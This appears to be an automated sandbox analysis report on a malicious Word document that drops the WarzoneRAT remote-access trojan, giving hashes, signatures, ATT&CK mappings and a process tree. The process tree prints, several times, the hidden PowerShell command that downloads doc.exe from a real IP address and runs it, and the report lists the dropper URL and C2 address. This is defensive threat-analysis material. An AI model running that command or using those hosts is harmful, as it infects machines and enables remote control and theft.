Analysis

  • max time kernel
    149s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    28-09-2021 09:22

General

  • Target

    catalogue_2021_samples_list_revise_ol.doc

  • Size

    535KB

  • MD5

    84c45c2b0e94b8d1d064e739150ba84c

  • SHA1

    f6a98ac4e50a89495626b5eaebb85d1116554faa

  • SHA256

    7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32

  • SHA512

    8fb31fc4147af9e1568c9799307b3d5a8b4a3ed607e14061769f239ce4dd9b10464b9f878900c8777f1550b9a9e8cdfb7901bb22d6fa958f9761a4831ddf6162

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://13.92.100.208/doc/doc.exe

Extracted

Family

warzonerat

C2

152.67.253.163:5300

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • suricata: ET MALWARE Possible Malicious Macro DL EXE Feb 2016

    suricata: ET MALWARE Possible Malicious Macro DL EXE Feb 2016

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Warzone RAT Payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\catalogue_2021_samples_list_revise_ol.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1112
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\Admin\AppData\Roaming\doc.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\doc.exe'"
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:332
      • C:\Users\Admin\AppData\Roaming\doc.exe
        "C:\Users\Admin\AppData\Roaming\doc.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:680
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 696
          4⤵
          • Loads dropped DLL
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1092
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\Admin\AppData\Roaming\doc.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\doc.exe'"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1304
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\Admin\AppData\Roaming\doc.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\doc.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:432
      • C:\Users\Admin\AppData\Roaming\doc.exe
        "C:\Users\Admin\AppData\Roaming\doc.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:292
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\maBdogbw" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE7CE.tmp"
          4⤵
          • Creates scheduled task(s)
          PID:836
        • C:\Users\Admin\AppData\Roaming\doc.exe
          "C:\Users\Admin\AppData\Roaming\doc.exe"
          4⤵
          • Executes dropped EXE
          PID:532
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1912

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      MD5

      b84828865be53111c19b02b7a174338d

      SHA1

      077831cb10f8a2212a20b8e7a3efe98f10423d25

      SHA256

      1ad67198ab117dd3f5027ea41e5608bf4889ae61edc2dcdf7a125524f4f98a71

      SHA512

      c40f747b80fe1c1e5a89d0b9af83ae2b1692b2213436654e9c5b50628aec48e25953d06fcd2f6eae3f72f85e2b6025d64786404e33a2ff7196333e81803dd54f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      MD5

      b84828865be53111c19b02b7a174338d

      SHA1

      077831cb10f8a2212a20b8e7a3efe98f10423d25

      SHA256

      1ad67198ab117dd3f5027ea41e5608bf4889ae61edc2dcdf7a125524f4f98a71

      SHA512

      c40f747b80fe1c1e5a89d0b9af83ae2b1692b2213436654e9c5b50628aec48e25953d06fcd2f6eae3f72f85e2b6025d64786404e33a2ff7196333e81803dd54f

    • C:\Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • C:\Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • C:\Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • C:\Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • C:\Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • \Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • \Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • \Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • \Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • \Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • \Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • \Users\Admin\AppData\Roaming\doc.exe
      MD5

      d8bc91e846e3d624814d4557681f33ad

      SHA1

      873f451438efce56d2bce9dd9b44beefb2c6a28b

      SHA256

      30fab10aa23c7dbb0b66b3b0491582f2bb6930e7bce11a078c3093ae4b40dc7e

      SHA512

      78909d822cb9706155b77b85cf1f9a274be7155c61ee71a49555932a11ba05311f308760b6baed3338cfcba6ec1647f010e5b13e25bde839f67033cd20739a24

    • memory/292-82-0x0000000000000000-mapping.dmp
    • memory/292-92-0x0000000000250000-0x000000000025E000-memory.dmp
      Filesize

      56KB

    • memory/292-90-0x00000000004B0000-0x00000000004B1000-memory.dmp
      Filesize

      4KB

    • memory/292-96-0x0000000000B60000-0x0000000000BAB000-memory.dmp
      Filesize

      300KB

    • memory/292-98-0x00000000009E0000-0x00000000009FF000-memory.dmp
      Filesize

      124KB

    • memory/332-62-0x0000000002590000-0x00000000031DA000-memory.dmp
      Filesize

      12.3MB

    • memory/332-63-0x0000000004B60000-0x0000000005096000-memory.dmp
      Filesize

      5.2MB

    • memory/332-61-0x0000000002590000-0x00000000031DA000-memory.dmp
      Filesize

      12.3MB

    • memory/332-60-0x0000000002590000-0x00000000031DA000-memory.dmp
      Filesize

      12.3MB

    • memory/332-58-0x0000000000000000-mapping.dmp
    • memory/432-70-0x0000000002300000-0x0000000002301000-memory.dmp
      Filesize

      4KB

    • memory/432-72-0x0000000002302000-0x0000000002304000-memory.dmp
      Filesize

      8KB

    • memory/432-77-0x0000000004C00000-0x0000000005136000-memory.dmp
      Filesize

      5.2MB

    • memory/432-65-0x0000000000000000-mapping.dmp
    • memory/432-71-0x0000000002301000-0x0000000002302000-memory.dmp
      Filesize

      4KB

    • memory/532-110-0x0000000000400000-0x0000000000554000-memory.dmp
      Filesize

      1.3MB

    • memory/532-102-0x0000000000405CE2-mapping.dmp
    • memory/532-101-0x0000000000400000-0x0000000000554000-memory.dmp
      Filesize

      1.3MB

    • memory/680-86-0x0000000000CC0000-0x0000000000CC1000-memory.dmp
      Filesize

      4KB

    • memory/680-91-0x0000000004DD0000-0x0000000004DD1000-memory.dmp
      Filesize

      4KB

    • memory/680-83-0x0000000000000000-mapping.dmp
    • memory/836-100-0x0000000000000000-mapping.dmp
    • memory/1092-112-0x0000000000370000-0x00000000003D0000-memory.dmp
      Filesize

      384KB

    • memory/1092-105-0x0000000000000000-mapping.dmp
    • memory/1112-57-0x0000000075871000-0x0000000075873000-memory.dmp
      Filesize

      8KB

    • memory/1112-55-0x000000006FAB1000-0x000000006FAB3000-memory.dmp
      Filesize

      8KB

    • memory/1112-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1112-54-0x0000000072031000-0x0000000072034000-memory.dmp
      Filesize

      12KB

    • memory/1304-74-0x0000000002500000-0x000000000314A000-memory.dmp
      Filesize

      12.3MB

    • memory/1304-64-0x0000000000000000-mapping.dmp
    • memory/1304-75-0x0000000002500000-0x000000000314A000-memory.dmp
      Filesize

      12.3MB

    • memory/1304-76-0x0000000004CB0000-0x00000000051E6000-memory.dmp
      Filesize

      5.2MB

    • memory/1304-73-0x0000000002500000-0x000000000314A000-memory.dmp
      Filesize

      12.3MB

    • memory/1912-95-0x000007FEFB541000-0x000007FEFB543000-memory.dmp
      Filesize

      8KB

    • memory/1912-94-0x0000000000000000-mapping.dmp